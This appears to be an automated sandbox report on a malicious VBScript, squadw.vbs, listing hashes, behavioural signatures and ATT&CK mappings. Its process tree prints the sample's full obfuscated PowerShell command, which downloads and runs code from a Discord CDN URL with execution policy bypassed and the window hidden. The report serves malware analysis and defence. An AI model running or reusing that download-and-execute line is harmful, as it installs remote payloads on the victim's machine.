80cc399540ed18faa7019f09dd2ac663689fa8ea246209309e9051b5b04110d5

General

Target

squadw.vbs
Size

825B
MD5

fe6492eed50dc9d3d807b03aae535d79
SHA1

bff235e3d137717701b0095eee41582ca7e39c0a
SHA256

80cc399540ed18faa7019f09dd2ac663689fa8ea246209309e9051b5b04110d5
SHA512

31773f3f1839282f0715bb0a2a9ec5da4e3899608fede4546eca8438a479663315d1c5edb66c0bf25f533f061357eaca40018ee85cfb353f967f56dbc27645d8

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 15 IoCs

Processes:

powershell.exe

flow	pid	process
5	860	powershell.exe
7	860	powershell.exe
8	860	powershell.exe
9	860	powershell.exe
11	860	powershell.exe
12	860	powershell.exe
13	860	powershell.exe
15	860	powershell.exe
16	860	powershell.exe
17	860	powershell.exe
19	860	powershell.exe
20	860	powershell.exe
21	860	powershell.exe
23	860	powershell.exe
24	860	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

860 powershell.exe

pid	process
860	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe
Token: SeIncBasePriorityPrivilege	860	powershell.exe
Token: 33	860	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 612 wrote to memory of 860	612	WScript.exe	powershell.exe
PID 612 wrote to memory of 860	612	WScript.exe	powershell.exe
PID 612 wrote to memory of 860	612	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\squadw.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/878366592180813876/894630606460301392/Main.png');$results
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:860

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/612-54-0x000007FEFC271000-0x000007FEFC273000-memory.dmp

Filesize
8KB

Download
memory/860-55-0x0000000000000000-mapping.dmp

Download
memory/860-57-0x000007FEF2AB0000-0x000007FEF360D000-memory.dmp

Filesize
11.4MB

Download
memory/860-59-0x0000000002952000-0x0000000002954000-memory.dmp

Filesize
8KB

Download
memory/860-58-0x0000000002950000-0x0000000002952000-memory.dmp

Filesize
8KB

Download
memory/860-60-0x0000000002954000-0x0000000002957000-memory.dmp

Filesize
12KB

Download
memory/860-61-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/860-62-0x000000000295B000-0x000000000297A000-memory.dmp

Filesize
124KB

Download
memory/860-63-0x000007FEEE080000-0x000007FEEF116000-memory.dmp

Filesize
16.6MB

Download
memory/860-64-0x000000000297A000-0x000000000297C000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads